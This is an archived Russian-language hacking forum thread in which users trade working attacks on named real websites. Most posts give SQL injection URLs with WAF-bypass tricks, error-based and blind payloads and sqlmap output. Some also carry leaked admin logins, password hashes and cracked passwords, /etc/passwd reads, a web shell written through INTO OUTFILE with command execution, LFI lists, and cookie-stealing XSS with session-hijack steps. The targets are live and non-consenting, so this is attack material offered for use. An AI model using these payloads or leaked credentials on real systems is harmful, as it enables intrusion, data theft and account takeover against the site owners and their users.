Просмотр полной версии : Уязвимости SQLi, XSS и другие.
leksadin
19.02.2017, 23:37
↑ (https://antichat.live/posts/4050788/)
Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....
Увы, но ты не прав. На страницу попадают не результаты запроса. Ситуация такова, что если запрос корректен (любого вида), то на сайте есть рекомендации, противном случае они пропадают. Это и есть блайнд.
Насчёт SiXSS - это когда твой запрос попадает сначала в SQL запрос, а потом отображается на сайте.И как один из результатов, например, юниона будет алерт.
↑ (https://antichat.live/posts/4051065/)
Увы, но ты не прав. На страницу попадают не результаты запроса. Ситуация такова, что если запрос корректен (любого вида), то на сайте есть рекомендации, противном случае они пропадают. Это и есть блайнд.
Насчёт SiXSS - это когда твой запрос попадает сначала в SQL запрос, а потом отображается на сайте.И как один из результатов, например, юниона будет алерт.
Так это не противоречит тому, что я написал. Если ты выводишь алерт через параметр со страницы или через скулю....это немного разные вещи. Я только об этом.
www.ghanaconsulate.ae (http://www.ghanaconsulate.ae)
Db Version :5.1.73-community
Db User : itscircle@localhost
Port :3306
Check if Symlink is ON :YES
Server Os Detected :Win32
http://www.ghanaconsulate.ae/about.php?id=-8 union select 1,group_concat(username,0x3a,password),3,4,5,6 from user--+
admin@ghanaconsulate.ae (mailto:admin@ghanaconsulate.ae):db38984fdc3d2fc99 2bdaaf12e64d976
db38984fdc3d2fc992bdaaf12e64d976:ITS@123
BabaDook
15.03.2017, 21:25
http://keralajobclub.com/candidate_profile.php?id==UlRJdXWYNGMWdlVxplRkh1VG plNZVFcrFWMkZ3UrRGVUNDaYVFMsFmVtJ1baZkWQ10V4ZUVwkD NiZFbJdVb4hWYwUjVVRlU0IlVKtEVq5EVTRlVGlVbstWYxoFeV pmSSJ2MCVnVxg2bTdkShRFbSZVZXh3cURlVWdlRkVzVVZlTUZk WWVFVKJkUspFRVxmUYZVV0kXWwg3bhFjU6NlaKNlVzIESXtmUT JWbGBHVtB3VNZVS5V1V1cUTx4UWjZkWsFWVwVEVYp1RNxWW410 RxoVZtljRaZEcvJmRWNzUtFjTNZ1a5dFWrBTTHpEaaZkWOJ2Mo ZVWrlTYixGbKd1aatWYUZFWWhEZTJWVxYXZEpkWkZUW4lFbKNV THlUMhJDeO5kVWllVzwmWSVVMNZFbWJVZqZkRVJTN3dlRjJzYH hHaUNTQ5lFVadXTWVFMRxmUYdFSBdXWyYUYWtGO4JGRGdVZIRG SWVkVLJVV180UsJ1Ul1GezRFVW50UGBXWSxmUrdVVwVFVtlzSN xmWXFlaORlVIFVeZFjSP10RGNDZEJkVNBjSFZVRWdVTX5EUiRk SrVmbkZUVtVzTNFjUVpVRoxGVrRzdaRUU41kRVpXYGhWVjdkUJ pVV1MXTyEFMORlQS1kMoVnVGJ1aTdkVQJGRKtmTEZlVaRlTv1U MSVkWFhGbVVEN4pFRVhXTGVkeiZEaVZ1RSllWVVzcN1WUx0kVW xWTygXdWVkUrd1RWBFVqZ0aORlVWlFVONnYsFVMaZEasVVR0cn WEVVNNZUV6NmRoVlUHJVdaVVNP10VRJTTWZFaNNjQZZFRWtmYt ZFUUpmQr5kaVdnVU50dixmU3p1R1wGVycneaRUW10kRFp3YE5U VWdkUJRVV18UTHJ1MNRkQW1EMKVlVIJ0aTVUMPJGROtGZ6F1dV RlTDFGbSVlUtRHa
Есть ещё всяких много разных, если будет интерес буду выкладывать редко
pastword
16.03.2017, 17:03
↑ (https://antichat.live/posts/4060872/)
http://keralajobclub.com/candidate_profile.php?id==UlRJdXWYNGMWdlVxplRkh1VG plNZVFcrFWMkZ3UrRGVUNDaYVFMsFmVtJ1baZkWQ10V4ZUVwkD NiZFbJdVb4hWYwUjVVRlU0IlVKtEVq5EVTRlVGlVbstWYxoFeV pmSSJ2MCVnVxg2bTdkShRFbSZVZXh3cURlVWdlRkVzVVZlTUZk WWVFVKJkUspFRVxmUYZVV0kXWwg3bhFjU6NlaKNlVzIESXtmUT JWbGBHVtB3VNZVS5V1V1cUTx4UWjZkWsFWVwVEVYp1RNxWW410 RxoVZtljRaZEcvJmRWNzUtFjTNZ1a5dFWrBTTHpEaaZkWOJ2Mo ZVWrlTYixGbKd1aatWYUZFWWhEZTJWVxYXZEpkWkZUW4lFbKNV THlUMhJDeO5kVWllVzwmWSVVMNZFbWJVZqZkRVJTN3dlRjJzYH hHaUNTQ5lFVadXTWVFMRxmUYdFSBdXWyYUYWtGO4JGRGdVZIRG SWVkVLJVV180UsJ1Ul1GezRFVW50UGBXWSxmUrdVVwVFVtlzSN xmWXFlaORlVIFVeZFjSP10RGNDZEJkVNBjSFZVRWdVTX5EUiRk SrVmbkZUVtVzTNFjUVpVRoxGVrRzdaRUU41kRVpXYGhWVjdkUJ pVV1MXTyEFMORlQS1kMoVnVGJ1aTdkVQJGRKtmTEZlVaRlTv1U MSVkWFhGbVVEN4pFRVhXTGVkeiZEaVZ1RSllWVVzcN1WUx0kVW xWTygXdWVkUrd1RWBFVqZ0aORlVWlFVONnYsFVMaZEasVVR0cn WEVVNNZUV6NmRoVlUHJVdaVVNP10VRJTTWZFaNNjQZZFRWtmYt ZFUUpmQr5kaVdnVU50dixmU3p1R1wGVycneaRUW10kRFp3YE5U VWdkUJRVV18UTHJ1MNRkQW1EMKVlVIJ0aTVUMPJGROtGZ6F1dV RlTDFGbSVlUtRHa
Есть ещё всяких много разных, если будет интерес буду выкладывать редко
интереснее то, как ты нашел уязвимость)), но все таки выкладывай, очень интересно увидеть разные случай.
BabaDook
29.03.2017, 20:51
Думал что- же такое. В итоге оказался пустяк.
http://randyfath.com/international.php?id=-53 UnIon SeLEcT 0x3120616e642066616c73652020207 56e696f6e2073656c65637420312c322c7573657228292c342 c352c36,2,3,4,5,6
Просто не обычно
joelblack
29.03.2017, 21:31
target:http://uzswlu.uz (http://uzswlu.uz)
type:SQL Injection
http://uzswlu.uz/site/search?search=1" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+
pastword
30.03.2017, 18:05
Sql-inject
http://dars.tj/topic.php?SECTION_ID=22'+UnIoN+SeLeCt+1,2,3,4,5,6, 7,8,concat_ws(0x3a,LOGIN,PASSWORD),10,11,12,13,14, 15,16,17,18,19,20,21,22,23+from+c_user+--+&ID=35&UPPER_ID=
admin:v0_S)B6j1a321ed955a9a82777afe79f9f74bc5d
teacher:eRuzjWNCd8a62f807a2fe77ab7c3e065697c36d7
Несколько SQLi с чтением файла из файловой системы
http://immersionprograms.com/index.php/info/gallery?sid=956&catid=-1 union all select 1,2,3,load_file('/etc/passwd'),5,6,7,8,9&mcatid=806
Здесь вывод в title
view-source:http://www.eandkwood.com/category.php?c=1' union all select 1,2,3,load_file('/etc/passwd'),5,6,7 and '0'='0
Некий шоп с фармой
http://www.rxnature.com/category.html?cid=1' union all select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13 and '0'='0
Запись минишела через SQLi и выполнение команд на сервере.
http://www.hamber.net/News_Detail.php?SN=-1 union all select 1,2,3,'',5,6,7 into outfile '/var/www/html/xux.php' --+
http://www.hamber.net/xux.php?cmd=ls -l
SQLi Error base внедрение двойным запросом.
http://www.hairboutique.com/glossary/Detail.php?Keyword=Dimethicone Copolyol Meadowfoamate' and (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) and '1'='1
root@HB-85|file_priv Y|5.5.19|Win64x86|
Сайт: russikona.ruТИЦ 160
SQLi Error base
russikon_db@localhost|file_priv N|5.5.52-cll-lve|Linux|MySQL Community Server (GPL)|x86_64|
http://www.russikona.ru/news.php?id=198' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='admin' limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
XSS-reflected:
http://www.russikona.ru/news.php?id=198%27%3e%3cbody+onload%3dalert(docume nt.cookie)%3e
Надеюсь ничьих чувств не оскорбил
Сайт: rakuraku-home.jp
SQLi Error base через POST
queserser_1301@10.1.0.111|5.0.27-standard-log|unknown-linux-gnu|x86_64|MySQL Community Edition - Standard (GPL)|
Уязвимые параметры account и password
В запросе через Repeater нужно отправить в параметр account эксплоит, а в параметр password любой символ, букву или цифру
эксплоит:
URL:http://www.rakuraku-home.jp/system/login/login.php
POST:' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) #
вход в админку логин и пароль 1' or '1
Админка:
http://www.rakuraku-home.jp/system/
Парочка сайтов с финансовой тематикой
Сайт: eltee.de
SQL Injection через GET, уязвимый параметр id, вывод в title
pc-linux-gnu:i686:dbo456679871@212.227.29.56:db456679871:5. 1.73
эксплоит:
view-source:http://www.eltee.de/education_id.php?id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version_compile_os,0x3a,@@versio n_compile_machine,0x3a,user(),0x3a,database(),0x3a ,@@version,0x3a,0x3a,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
Сайт: businesstoday.lk
SQL Injection через GET, уязвимый параметр issue
5.5.52-cll:bttoday_bt:bttoday_btadmin@localhost:Linux:i68 6:/usr
эксплоит:
http://www.businesstoday.lk/bnb.php?bnbId=&issue=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version,0x3a,database(),0x3a,use r(),0x3a,@@version_compile_os,0x3a,@@version_compi le_machine,0x3a,@@basedir,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
Шоп с 3d принтерами и всяким оборудованием
Сайт: smtmax.com
SQL Injection через GET, уязвимый параметр act
Linux:x86_64:smtmax8_smtmax@localhost:smtmax8_smtm ax:5.6.35:/usr
эксплоит:
http://www.smtmax.com/info.php?act=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1) %3e(SELECT+COUNT(*)%2cCONCAT(%40%40version_compile _os%2c0x3a%2c%40%40version_compile_machine%2c0x3a% 2cuser()%2c0x3a%2cdatabase()%2c0x3a%2c%40%40versio n%2c0x3a%2c%40%40basedir%2c0x3a%2cFLOOR(RAND(0)*2) )a+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+a)b )%2b%27
Сайт адалт тематики: straightpornstuds.com
Примерные данные за день
Посетителей: 1469
Просмотров: 5878
Boolean Based SQL Injection
5.0.96 log:str5lt3m 2@107.180.121.24:str5lt3m1 2
Если появился видео ролик от BRAZERS с брюнеткой в очках с толстой жопой и силиконовыми буферами значит "true"
Если перекинуло на ролик от DDFnetwork где бландинку долбят в рот в четыре ствола это "false"
эксплоит:
http://straightpornstuds.com/80341%20OR%20(select%20ascii(substr(database(),1,1 ))=115).html
P.s. когда true страничка может долго подгружаться.
Щоп с компьютерными аксессуарами
Сайт: groupgear.co.uk
MS SQL Injection через POST
уязвимый параметр inputsearch
microsoft sql server 2012 (sp1) - 11.0.3156.0 (x64) may 4 2015 18:48:09 copyright (c) microsoft corporation web edition (64-bit) on windows nt 6.2 <x64> (build 9200: ) (hypervisor)|
computergear2012|computerSQL2014
эксплоит:
URL:http://www.groupgear.co.uk/searchResults.asp
POST:'AND 1=cast(@@VERSION as varchar(8000)) or '1'='
Сайт: magiclantern.org.uk
Boolean Based SQL Injection черз GET, уязвимый параметр id
5.5.54-38 7-log:umag_249477_0001 linweb7.atlas.pipex.net:magiclanternorguk_249477_d b1
Если есть пост с заголовком The Temple of Minerva "true"
Если нет поста с заголовком The Temple of Minerva "false"
Эксплоит:
http://www.magiclantern.org.uk/sales/publications.php?id=13 OR (select ascii(substr(@@VERSION,1,1))=53)
Stored XSS:
Уязвимые параметры: Contact_Name;Email_address;Email_address2;Subject
Открываем URL в Firefox и в одном из уязвимых полей или во всех вставляем payload, жмем Submit, наш код сохранился на сервере
URL:http://www.magiclantern.org.uk/contact.php
payload: ">
Теперь нужно сохранить Cookie PHPSESSID(из Firefox) в блокнот
Вычистим куки из Firefox и пройдем снова по нашему URL ни чего не работает (( закрываем Firefox и открываем другой браузер,
например хром, устанавливаем туда любой кукименежжер, открываем любую страницу нашего сайта например главную magiclantern.org.uk
в куки менеджере меняем Cookie PHPSESSID(из Хром) на Cookie PHPSESSID(из Firefox) переходим на вкладку Contact Us видим выполнение нашего скрипта в хроме.
BabaDook
22.05.2017, 01:39
НУ я так и знал. А вам слабо самому что-то найти и сделать? Вы попробуйте, я уверен вы сможете. Я просто не понимаю, я конечно не профи, но я невкуриваю, зачем крутить как слепую когда есть вывод. А вообще, скажи мне , что это а инструмент такой?
Там ещё мод сек, только что он делает я не понял
http://s018.radikal.ru/i520/1705/a7/7398f4b53cfc.png (http://radikal.ru)
↑ (https://antichat.live/posts/4087666/)
НУ я так и знал.
http://www.magiclantern.org.uk/sales/publications.php?id=-1 union all select 1,2,USER(),@@version,database(),@@basedir,@@versio n_compile_os,@@version_compile_machine,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39 --+
Так лучше ? ))
↑ (https://antichat.live/posts/4087780/)
Нет, не лучше. Ты каким софтом крутишь?
burpsuite, SQLmap, Netsparker
SQLi с чтением файла из файловой системы и file_priv Y
Сайт:eohu.ca
Уязвимый параметор: newsID через GET
root:Y,root:Y,root:Y,debian-sys-maint:Y,phpmyadmin:N,root:Y
root@localhost:5.1.49-1ubuntu8:debian-linux-gnu:x86_64
Эксплоит:
http://www.eohu.ca/news/view_news_e.php?newsID=-1' union all select group_concat(user,0x3a,file_priv),user(),load_file ('/etc/passwd') from mysql.user --+
SQLi с чтением файла из файловой системы
Сайт:bbgv.org
Уязвимый параметор: cat_id через GET
root:Y,root:Y,root:Y,:N,:N,bbgv_web:N,bbgv_bk:N
root@localhost:5.1.73:redhat-linux-gnu:x86_64
Эксплоит:
view-source:http://bbgv.org/bbgv-events/events.html?cat_id=-1 union all select 1,2,3,group_concat(user,0x3a,file_priv),5,6,7,8,9, 10,user(),12,13,14,15,load_file('/etc/passwd'),17,18,19,20,21,22,23,24,25,26 from mysql.user --+
Сайт:salut.ru ТИЦ 475
SQLi Error base черз GET, уязвимый параметр SectionId
salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/
Эксплоит:
http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
Сайт:irbis-opt.ru ТИЦ 20 Всякие палатки и спортивная снаряга
SQLi черз GET, уязвимый параметр idd
nordsportspb@81.177.141.127:10.1.22-MariaDB:Linux:x86_64:/usr
Эксплоит:
http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+
Сайт:economic-study.ru ТИЦ 10 Вузы Москвы
SQLi черз GET, уязвимый параметр ID
vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr
Эксплоит:
http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compil e_os,@@version_compile_machine,@@basedir,10 --+
Octavian
25.05.2017, 18:02
↑ (https://antichat.live/posts/4089268/)
Сайт:salut.ru
ТИЦ 475
SQLi Error base черз GET, уязвимый параметр SectionId
salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/
Эксплоит:
http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
Сайт:irbis-opt.ru
ТИЦ 20
Всякие палатки и спортивная снаряга
SQLi черз GET, уязвимый параметр idd
nordsportspb@81.177.141.127:10.1.22-MariaDB:Linux:x86_64:/usr
Эксплоит:
http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+
Сайт:economic-study.ru
ТИЦ 10
Вузы Москвы
SQLi черз GET, уязвимый параметр ID
vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr
Эксплоит:
http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compil e_os,@@version_compile_machine,@@basedir,10 --+
.ru саиты запрещены
↑ (https://antichat.live/posts/4089287/)
.ru саиты запрещены
Я когда форум просматривал, посты с .ru часто попадались, или это новые правила?
Если админы скажут не вопрос, удалю свой пост.
Да и софтом я в .ru не лазил, искал через дорки и крутил руками
Сайт:ene.com.tw
SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
Эксплоит:
http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@versio n,load_file('/etc/passwd'),8,9,10 from mysql.user --+
BabaDook
27.05.2017, 23:08
http://s019.radikal.ru/i644/1705/37/90aa42673649.png (http://radikal.ru)
Octavian
11.06.2017, 14:54
Предугадываем URL восстановление пароля md5(time())
http://help.orange.md/resetpassword/be28b3765fe7914555df3f3df39caa2e
http://www.luxpodarok.com.ua/index.php?for=999999.9 union all select }here sql{
sqli: http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637 UNION ALL SELECT 1,2,3 (http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637%20UNION%20ALL%20SELECT%201,2,3 )
а дальше не получается раскрутить
↑ (https://antichat.live/posts/4089682/)
Сайт:ene.com.tw
SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid
root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.
enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.
Эксплоит:
http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@versio n,load_file('/etc/passwd'),8,9,10 from mysql.user --+
Давно созрел вопрос, да только все никак руки не "доходили". Можно ли залить шелл вместо "load_file('/etc/passwd')"? Просто пока не понимаю, почему срабатывает php в SQL иньекции...
↑ (https://antichat.live/posts/4134233/)
почему срабатывает php в SQL иньекции...
php тут не причем, mysql поддерживает работу с файловой системой
https://www.w3resource.com/mysql/string-functions/mysql-load_file-function.php
https://dev.mysql.com/doc/refman/5.7/en/select-into.html
Спасибо. Век живи, век учись.
Я кодинге не очень силен, но таковы правила форума и писать я могу только здесь. Помогите набрать 5 репутации
BabaDook
23.10.2017, 22:45
http://www.handelingsgerichtwerken.be/bestanden/download.php?id=69'+and+false+union select null, 2,3,4,group_concat(0x202020,table_name,0x3c3e,colu mn_name)+from information_schema.columns+where t able_schema=database()+--+-
Octavian
28.12.2017, 20:49
http://www.saifaiims.com/download.php?filename=../config/configuration.php
http://www.baikap.de/index2.php?include=/etc/passwd&id=85&language=E|LFI|[DE] Germany|12/21/2017 05:38:42
http://www.avionews.it/index.php?corpo=/etc/passwd&news_id=1207340&pagina_chiamante=index.php|LFI|[IT] Italy|12/22/2017 06:51:05
https://drbl.org/management/techrpt.php?c=../../../../../etc/passwd&t=Start, restart or stop DRBL-related services|LFI|[JP] Japan|12/23/2017 06:10:26
http://caiana.caia.org.ar/template/caiana.php?pag=../../../../../etc/passwd&vol=3|LFI|[AR] Argentina|12/23/2017 08:47:59
http://www.energetica-india.net/download.php?seccion=articles&archivo=../../../../../../../../etc/passwd|LFI|[ES] Spain|12/23/2017 08:52:43
http://www.mcu.es/deportebase/cgi/um?M=/d7/f7&O=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd% 00&N=&L=0|LFI|[ES] Spain|12/23/2017 09:00:57
https://www.txregionalcouncil.org/display.php?page=/etc/passwd|LFI|[US] United States|12/23/2017 09:10:58
http://www.basegroup.su/index.php?Page=http%3a%2f%2fwww.google.com|RFI|[RU] Russian Federation|12/23/2017 09:58:38
http://www.iatvt.ru/index.cgi?doc=../../../../../../etc/passwd%00|LFI|[RU] Russian Federation|12/23/2017 10:54:42
http://www.musifratz.de/content.php?seite=/etc/passwd&rubrik=kinderkultur&ansicht=projekte|LFI|[DE] Germany|12/23/2017 11:13:42
BabaDook
02.01.2018, 16:51
http://www.bpc.gov.bd/contactus.php?id=4439'+/*!12345UNiOn*/%0ASeLEct+1,2,/*!50000user()*/,4,5,6,7+--+_
ebfashion.com.bd/index.php?id=-8'+UnIoN+SeLEcT+1,user(),2+--+-
http://www.vertexhome.co.il/pageE.php?id=110+UnIon+SeLEct+1,2,3,4,5,6,7,8,9,gr oup_concat(table_name),11 from information_schem a.tables where table_schema=database()+--+-
http://foundation.sigmachi.org/station.php?id=wtg'+and+false+UnIon%0ASeLEct+1,use r(),3,4,5,6+--+_
http://www.commongroundnews.org/article.php?id=-32240'+/*!12345UnIoN%0ASeLEcT*/+1,2,user(),4,(/*!12345SELECT*/+/*!12345GROUP_CONCAT(table_name+SEPARATOR+0x3c62723 e)+FROM+/*!50000INFORMATION_SCHEMA.TABLES*/+WHERE+TABLE_SCHEMA=DATABASE()),6,7,8,9,10,11,12,1 31,4,15,15,15,15,15,16,16,22+--+-&lan=ba&sp=1
http://oppodigital.in/product-details.php?id=9 and false UNiOn+SElEcT @,@,@, @,@,@,@,@,group_concat(table_name),@ from inform ation_schema.tables #
https://depositfiles.od.ua/tools/httpheaders.php
https://a.radikal.ru/a37/1801/32/9659b8e5d398.png (https://radikal.ru)
ShpillyWilly
09.01.2018, 13:07
http://www.tnla.com/events.php?id=38+UNION+SELECT+1,concat(username,pa ssword)+from+tnlacom_tnla.admin_users+--+
Провайдер Электронный щит.
Локальная XSS.
http://wwwcom.ru/connect.php/%22%3E%3Cscript%3Ealert('Tayler(Mexel)')%3C/script%3E
joelblack
15.01.2018, 05:25
target: http://www.premium-network.ru
type: Time-based, Error-based
user:forumpt@localhost1
version:5.5.371
Time-based:
www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15) ,1)--+
Error-based:
http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(versio n(),floor(rand(0)*2))x,2,3%20from%20information_sc hema.tables%20group%20by%20x--+
OOB XXE
http://www.xmlforasp.net/SchemaValidator.aspx
XML Payload:
&test;
.dtd File:
">
%all;
https://i.imgur.com/tkvMGVC.jpg
BabaDook
03.02.2018, 14:40
↑ (https://antichat.live/posts/4173376/)
target: http://www.premium-network.ru
type: Time-based, Error-based
user:forumpt@localhost1
version:5.5.371
Time-based:
www.premium-network.ru/index.php?id=sktv_news&ns=70'+and+if(substring(version(),1,1)=5,SLEEP(15) ,1)--+
Error-based:
http://www.premium-network.ru/index.php?id=sktv_news&ns=70%27%20union%20select%20count(*),concat(versio n(),floor(rand(0)*2))x,2,3%20from%20information_sc hema.tables%20group%20by%20x--+
Лайк тому кто попробует сделать с выводом, не люблю я слепые, OOB приветствуется.Точку входа не менять желательно.
↑ (https://antichat.live/posts/4180264/)
Лайк тому кто попробует сделать с выводом, не люблю я слепые, OOB приветствуется.Точку входа не менять желательно.
70('UNION ALL SELECT 1,2,version(),3-- a)---
Вывод в мета-теге:
↑ (https://antichat.live/posts/4180275/)
70('UNION ALL SELECT 1,2,version(),3-- a)---
Вывод в мета-теге:
70'+union+select+1,version(),3,4--+
Тут же банально все, зачем скобки?
BabaDook
04.02.2018, 03:16
http://www.boxofficemojo.com/.htaccess
view-source:http://www.boxofficemojo.com/maintenance.html
Octavian
04.02.2018, 19:35
Sql Injection
http://www.ceadir-lunga.md/index.php?prm=999%27+UNION+ALL+SELECT+version()+--+&mid=201
http://retrofilms.in/forum/feedcat.php?id=2%27+union+all+select+1,2,3,4,5,6,7 ,8,9+--+
Мда редкость
http://katalogshop.md/tmp/
BabaDook
16.02.2018, 23:00
http://pravoslavsad4.ru/view_index21b.php?id=-1%27%20UnIon%20SeLEct%201%2C2%2C3%2C4%2C5%2C6%2C0x 3c7363726970743e616c65727428646f63756d656e742e646f 6d61696e293c2f7363726970743e%20--%20-
BabaDook
06.03.2018, 22:45
↑ (https://antichat.live/posts/4133806/)
sqli:
http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637 UNION ALL SELECT 1,2,3 (http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637%20UNION%20ALL%20SELECT%201,2,3 )
а дальше не получается раскрутить
Что не получается? П.С только сейчас увидел ты это аттак
http://атаксупермаркет.рф/goods.aspx?id=(SELECT+TOP+1+TABLE_NAME+FROM+INFORM ATION_SCHEMA.TABLES +WHERE+TABLE_NAME+NOT+IN+('ym l_catalog','shop','email','currencies','currency', 'categories','category','offers','offer','category Id','picture','orderingTime','onstock','ordering') )+--+
Дальше сам
https://rdot.org/forum/showthread.php?t=826
BabaDook
17.03.2018, 19:11
https://www.mournhockey.com.ua/go.php?http://FFFFFFF.org
http://iz.com.ua/engine/go.php?url=aHR0cDovL2dvb2dMZS5jb20=
OpenRedirect
https://bosa.in.ua/event/?id=1'+and+false+%55%6e%49%6f%4e+%2f%2a%21%31%32%3 3%34%35%53%65%4c%45%63%74%2a%2f+1,user(),3,4,5,6,7 ,8,9,database(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,versio n(),6,7,8,9,0,1+--+-
https://www.edmunds.com/a/?":""});alert(document.cookie);//
http://oregonstate.edu/training/course_search.php?subject=">alert(999)
https://lyricstranslate.com/?page=">alert(7889789)
http://720pizle.com/ara.asp?a=">alert(7889789)
http://epinions.com/search/books/63715?">alert(6456456)
https://mgronline.com/south/1232/search?searchTxt=">alert(045839)
http://naszemiasto.pl/firmy/,polska,78425,21.html?miasto=">alert(4389)
http://www3.gogoanime.tv/">alert(4389)
https://bursadabugun.com/ruya-tabirleri/?q[keyword]=">alert(4389)
https://computerhoy.com/listas/internet/mejores-cascos-auriculares-inalambricos-2016-32365?page=alert(4389)
https://warframe.market/alert(4389)
https://goal.in.th/%E0%B8%9C%E0%B8%A5%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B 8%A2%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%AB%E0%B8%A5% E0%B8%B1%E0%B8%87/?Line=">alert(4389)
http://www.gazetevatan.com/Default.aspx?aType=';alert();//
http://thebitcoincode.com/video.php?poster=">alert(4389)
https://gamebanana.com/tools?">alert(4389)
https://indosport.com/">alert(4389)
http://brasilescola.uol.com.br/">alert(4389)
https://watchasian.co/">alert(4389)
https://mgronline.com/south/1232/search?searchTxt=">alert(4389)
http://portail.free.fr/services/pagesjaunes/bons-plans.php?where=">alert(4389)
http://minnstate.edu/jobs/searchResults.php?">alert(4389)
https://eadaily.com/">alert(00088)
http://projectfreetv.bz/hd/project.php?title=alert(4389)
http://cnrtl.fr/lexiques/morphalou/licence_morphalou.php?version=">alert(4389)
Octavian
23.06.2018, 14:35
↑ (https://antichat.live/posts/4220479/)
http://www.infocom.md/beneficiari.php?id=1%27+UnIoN+SeLEct+1,user(),(sel ect(select+concat(@:=0xa7,(select+count(*)from(inf ormation_schema.columns)where(@:=concat(@,0x3c6c69 3e,table_name,0x3a,column_name))),@)))+--+-
/threads/426171/page-6 (https://antichat.live/threads/426171/page-6/)
Выкладывал уже
http://wrestling.work/eventchapter.php?id=2%27+union+select+1,2,(select( @x)from(select(@x:=0x00),(select(0)from(tione_igs. applications)where(0x00)in(@x:=concat(@x,0x3c62723 e,user,0x3a,pass))))x),4,5,6,7,8,9,10--+1
http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
.SpoilerTarget" type="button">Spoiler: from sqlmap
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK
Vector: AND MAKE_SET([INFERENCE],[RANDNUM])
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)#
Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
.SpoilerTarget" type="button">Spoiler: bd
available databases [110]:
